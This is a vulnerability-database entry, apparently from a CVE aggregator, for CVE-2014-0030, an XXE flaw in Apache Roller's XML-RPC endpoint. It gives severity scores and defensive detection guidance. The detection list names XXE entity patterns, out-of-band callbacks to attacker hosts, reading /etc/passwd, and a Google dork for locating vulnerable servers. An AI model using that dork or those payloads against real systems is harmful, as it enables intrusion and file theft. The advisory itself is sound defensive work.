cbcvebase.
CVE-2014-0030
published 2017-10-10

CVE-2014-0030: The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.

PriorityP266critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
16.87%
96.7th percentile
The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.

Affected

6 ranges
VendorProductVersion rangeFixed in
apacheroller
apacheroller
apacheroller
apacheroller
apacheroller
apacheroller

Detection & IOCsextracted from sources · hover to see the quote

url/roller-services/xmlrpc
  • Monitor for unauthenticated or anomalous HTTP POST requests to the Apache Roller XML-RPC endpoint path /roller-services/xmlrpc, which is the attack delivery point for XXE payloads.
  • Inspect POST body content to /roller-services/xmlrpc for XML DOCTYPE declarations containing ENTITY definitions (e.g., &xxe; or %dtd; references), which are characteristic of XXE injection attempts.
  • Detect outbound HTTP callbacks from the server to attacker-controlled hosts triggered during XML parsing — indicative of the advanced out-of-band XXE variant used by this exploit.
  • Use the Google dork to identify exposed vulnerable Apache Roller instances: intext:"apache roller weblogger version {vulnerable_version_number}"
  • ·The vulnerability affects Apache Roller versions before 5.0.3; the exploit script targets the XML-RPC protocol support. Ensure the endpoint /roller-services/xmlrpc is disabled or access-controlled if upgrading is not immediately possible.
  • ·The exploit has two modes: a simple in-band file disclosure mode (reading files like /etc/passwd directly in the XML-RPC fault response) and an advanced out-of-band mode using an attacker-hosted DTD server, requiring detection coverage for both patterns.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.